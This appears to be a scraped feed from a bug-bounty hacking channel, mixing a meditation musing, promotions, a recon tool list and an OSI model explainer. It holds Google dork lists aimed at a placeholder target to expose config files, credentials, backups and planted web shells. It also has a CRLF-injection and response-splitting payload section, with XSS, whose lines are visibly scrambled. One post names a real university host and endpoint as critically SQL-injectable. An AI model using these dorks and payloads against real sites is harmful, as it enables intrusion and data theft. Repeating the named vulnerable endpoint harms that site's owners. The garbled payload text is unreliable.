2246
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Small update on the upcoming video
I will upload it soon😌
I was Meditating for Ideas And This Popped up
" The Thoughts From Universe"
Idk We will call It whatever
Coz I am not familiar with this concept
Says That
Universe Live At Harmony at Neutral state(=) and That's the Refresh point
But Grows and Falls on charge state ( - or +)
Means At charged State It Grows
Eg - Success and Failure
And In Charge state
Both comes in one Hand
If There success then Failure Will be must And
Both success and Failure will try to be of Equal charge
Eg - 10 wins Means Mostly You will get 10 Failure too After the Wins
But At fall state You can Neutralise It by Wins Or Something Polar opposite to That
To Refresh the starting point
Like If You Are Having Intense Cravings about Something
Then Then Think Painful thoughts about that Addiction
Then Thing will neutralise
I Just Wrote this down
Coz I found this interesting
And It's A Thought from somewhere in Universe
I know it sounds lots like Yapping
But I would take it seriously
- Aijak Ofc
Bug-Bounty notes
>💛Welcome to the Future of Cybersecurity
>Overview
👣OSINT
ℹ️Recon Tips
>✳️Mastering the Art of Writing Clear and Effective Vulnerabilities Report
>Twitter
🌆Subdomain Enumeration
>Tools
🔑Nmap's NSE Scripts for Ethical Password Testing
👻Cheat-sheet's
>Exploitation
Link 🔗:-
Https://book.cipherops.xyz
Author: @laazy_hack3r
@GitBook_s
LFI | RFI | Traversal Cheat Sheet 🔰
🔖#infosec #cybersecurity #hacking #pentesting #security
#Cyber_Education
Using SeTcbPrivilege for educational purposes
https://github.com/daem0nc0re/PrivFu/tree/main/PowerOfTcb
# Google Dorks Cli
# https://github.com/six2dez/degoogle_hunter
degoogle_hunter.sh company.com
# Google dorks helper
https://dorks.faisalahmed.me/
# Code share sites
site:http://ideone.com | site:http://codebeautify.org | site:http://codeshare.io | site:http://codepen.io | site:http://repl.it | site:http://jsfiddle.net "company"
# GitLab/GitHub/Bitbucket
site:github.com | site:gitlab.com | site:bitbucket.org "company"
# Stackoverflow
site:stackoverflow.com "target.com"
# Project management sites
site:http://trello.com | site:*.atlassian.net "company"
# Pastebin-like sites
site:http://justpaste.it | site:http://pastebin.com "company"
# Config files
site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:env | ext:ini
# Database files
site:target.com ext:sql | ext:dbf | ext:mdb
# Backup files
site:target.com ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
# .git folder
inurl:"/.git" target.com -github
# Exposed documents
site:target.com ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
# Other files
site:target.com intitle:index.of | ext:log | ext:php intitle:phpinfo "published by the PHP Group" | inurl:shell | inurl:backdoor | inurl:wso | inurl:cmd | shadow | passwd | boot.ini | inurl:backdoor | inurl:readme | inurl:license | inurl:install | inurl:setup | inurl:config | inurl:"/phpinfo.php" | inurl:".htaccess" | ext:swf
# SQL errors
site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
# PHP errors
site:target.com "PHP Parse error" | "PHP Warning" | "PHP Error"
# Login pages
site:target.com inurl:signup | inurl:register | intitle:Signup
# Open redirects
site:target.com inurl:redir | inurl:url | inurl:redirect | inurl:return | inurl:src=http | inurl:r=http
# Apache Struts RCE
site:target.com ext:action | ext:struts | ext:do
# Search in pastebin
site:pastebin.com target.com
# Linkedin employees
site:linkedin.com employees target.com
# Wordpress files
site:target.com inurl:wp-content | inurl:wp-includes
# Subdomains
site:*.target.com
# Sub-subdomains
site:*.*.target.com
#Find S3 Buckets
site:.s3.amazonaws.com | site:http://storage.googleapis.com | site:http://amazonaws.com "target"
# Traefik
intitle:traefik inurl:8080/dashboard "target"
# Jenkins
intitle:"Dashboard [Jenkins]"
⚡️⚡️⚡️Bug Bounty Tip⚡️⚡️⚡️
🤡🤡New Google Dork: Have You Checked Linktr.ee?
🔼🔽It seems that many users unknowingly store confidential documents and access information on Linktr.ee.
💸💸💸Try using this dork:
site: linktr.ee + keyword## CRLF Injection || HTTP Response Splitting
%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
0d%0aheader:header%0
aheader:header0d
%
header:header3%
%2
0dheader:header%0
%3f
dheader:header50a
/%2
header:header250
/%25
aheader:header0ah
/%%0a
eader:headerdhe
/%3f%0
ader:headerhea
/%23%0d
der:headerhea
/%25%30a
der:header1he
/%25%30%6
ader:headerder
/%u000ahea
:headerd with Open Redirect server misconfiguration
CRLF chaine
om/%2f%2e%2e%0d%0aheader:headerom
/www.google.c
/%2e%2e%2f%0d%0aheader:headerF.
/google.com/%2
.%0d%0aheader:headeric CRLF by @filedescriptor
Twitter specif
Dheader:headerto XSS
CRLF Injection
th:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2eng on 302 Redirect, before Location header (Discovered in DoD)
Response splitti
%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
Response splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301 by @black2fan (Facebook bug)reaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code.
Sql Injection
HOST: cutm.ac.in
ENDPOINT: https://cutm.ac.in/payu/skill/index.php?id=1
SEVERITY: Critical
IMPACT: Critical
Hey Hackers !
PentestList is a fantastic resource for the cybersecurity and ethical hacking community!
Key Features of PentestList 🌟:
• Comprehensive Directory 📂
• Search & Filter 🔍
• Verified Listings ✅
• User Reviews & Ratings ⭐️
• Up-to-Date Information 🕒
• Easy Comparison ⚖️
• Resource Hub 🛠
PentestList is designed to be your go-to resource for finding the best penetration testing services and staying ahead in the cybersecurity world!
Go : https://pentestlist.com/
something is coming up guys,
check this out and let me know your thoughts
🔰 Updated Bug Bounty tool List!
dnscan https://github.com/rbsec/dnscan
Knockpy https://github.com/guelfoweb/knock
Sublist3r https://github.com/aboul3la/Sublist3r
massdns https://github.com/blechschmidt/massdns
nmap https://nmap.org
masscan https://github.com/robertdavidgraham/masscan
EyeWitness https://github.com/ChrisTruncer/EyeWitness
DirBuster https://sourceforge.net/projects/dirbuster/
dirsearch https://github.com/maurosoria/dirsearch
Gitrob https://github.com/michenriksen/gitrob
git-secrets https://github.com/awslabs/git-secrets
sandcastle https://github.com/yasinS/sandcastle
bucket_finder https://digi.ninja/projects/bucket_finder.php
GoogD0rker https://github.com/ZephrFish/GoogD0rker/
Wayback Machine https://web.archive.org
waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
Sn1per https://github.com/1N3/Sn1per/
XRay https://github.com/evilsocket/xray
wfuzz https://github.com/xmendez/wfuzz/
patator https://github.com/lanjelot/patator
datasploit https://github.com/DataSploit/datasploit
hydra https://github.com/vanhauser-thc/thc-hydra
changeme https://github.com/ztgrace/changeme
MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/
Apktool https://github.com/iBotPeaches/Apktool
dex2jar https://sourceforge.net/projects/dex2jar/
sqlmap http://sqlmap.org/
oxml_xxe https://github.com/BuffaloWill/oxml_xxe/
XXE Injector https://github.com/enjoiz/XXEinjector
The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool
ground-control https://github.com/jobertabma/ground-control
ssrfDetector https://github.com/JacobReynolds/ssrfDetector
LFISuit https://github.com/D35m0nd142/LFISuite
GitTools https://github.com/internetwache/GitTools
dvcs-ripper https://github.com/kost/dvcs-ripper
tko-subs https://github.com/anshumanbh/tko-subs
HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer
Race the Web https://github.com/insp3ctre/race-the-web
ysoserial https://github.com/GoSecure/ysoserial
PHPGGC https://github.com/ambionics/phpggc
CORStest https://github.com/RUB-NDS/CORStest
Retire-js https://github.com/RetireJS/retire.js
getsploit https://github.com/vulnersCom/getsploit
Findsploit https://github.com/1N3/Findsploit
bfac https://github.com/mazen160/bfac
WPScan https://wpscan.org/
CMSMap https://github.com/Dionach/CMSmap
Amass https://github.com/OWASP/Amass
Extra Tools
http://projectdiscovery.io
Add 'app/config/config.local.neon' to the wordlist, and maybe you will get juicy data.
By: @NoRed0x
#bugbountytips #bugbountytip
OSI Model
____ __ _
The OSI (Open Systems Interconnection) model is a conceptual framework used to understand and standardize the functions of a networking system. It divides the process of communication in a network into seven distinct layers, each responsible for different aspects of data transmission.
The Seven Layers:
1️⃣Physical Layer (Layer 1): Deals with the physical connection between devices, including cables, switches, and the transmission of raw binary data.
2️⃣Data Link Layer (Layer 2): Manages the data frames between two directly connected nodes and handles error detection and correction.
3️⃣Network Layer (Layer 3): Responsible for logical addressing and routing, ensuring that data packets are sent from the source to the destination across multiple networks.
4️⃣Transport Layer (Layer 4): Provides end-to-end communication, error recovery, and flow control between devices, often using protocols like TCP and UDP.
5️⃣Session Layer (Layer 5): Manages sessions or connections between applications, establishing, maintaining, and terminating communication.
6️⃣Presentation Layer (Layer 6): Translates data between the application layer and the network, handling data encryption, compression, and conversion.
7️⃣Application Layer (Layer 7): Interfaces directly with the end user, providing network services such as email, file transfer, and web browsing.
Video coming soon guys
Give a lot of reaction to this
#Tech_book
#cryptography
"Cryptography and Embedded Systems Security", 2024.
#exploit
"Find and exploit race condition bugs in modern JS engines".
SQL Injection Cheat Sheet 💉
🔖#infosec #cybersecurity #hacking #pentesting #security #sqli
Tool alert🚨👇
Steps to install autoip changer tool
.
.
✔️ Share It with Your Friends.
🔗 CHECKOUT THE LINK IN BIO
🔥 Don’t miss the HIGHLIGHTS
🤔 Any queries? Don’t hesitate to DM.
❤️ LIKE, COMMENT, SHARE and SAVE the post.
#RedTeam #InfoSec #CyberSecurity #EthicalHacking #KaliLinux #CyberSec #HackerLife #PenTesting
https://www.instagram.com/cipherops.tech/p/C-j99vdSeV5/?igsh=MTc4MmM1YmI2Ng==
How Hackers Perform Device Scans on a Network with Nmap
Posted by @TheGodEye
☄️Want to learn how to hack? First, you'll need to get a good grip on these basics:
✔️Networking: Figure out how computers talk to each other.
✔️Coding: Learn to build and break stuff with code.
✔️Linux: Master this operating system – it's a hacker's playground.
🛡The better you understand these, the faster you'll pick up hacking skills.
Plaaning to do something in 2024
## Advanced Recon
- Advanced Recon
- Sniffing HTTP and HTTPS
- MITM
## Dorking
- SQL Injection
- XSS
- HTML Injection
## Pen Testing Tools and Techniques
- Burpsuite and Tools
- SSH Enumeration and Brute Forcing
- Buffer Overflow
- Active Directory Enumeration
- S3 Bucket Enumeration and Exploitation and more
⚠️New BBP Target⚠️
🚀https://security.embracecloud.nl/.well-known/security.txt
https://www.acfcs.org/acfcs-contributor-report-bitcoin-tracking-for-law-enforcement
Читать полностью…
malvinval/ssrf-to-server-takeover-poc-bug-bounty-writeup-82d6715e333d" rel="nofollow">https://medium.com/@malvinval/ssrf-to-server-takeover-poc-bug-bounty-writeup-82d6715e333d
Читать полностью…
https://x.com/Rhynorater/status/1699395452481769867?t=2qXY5Fp_LUUzf-S0Vxb5fA&s=35
Читать полностью…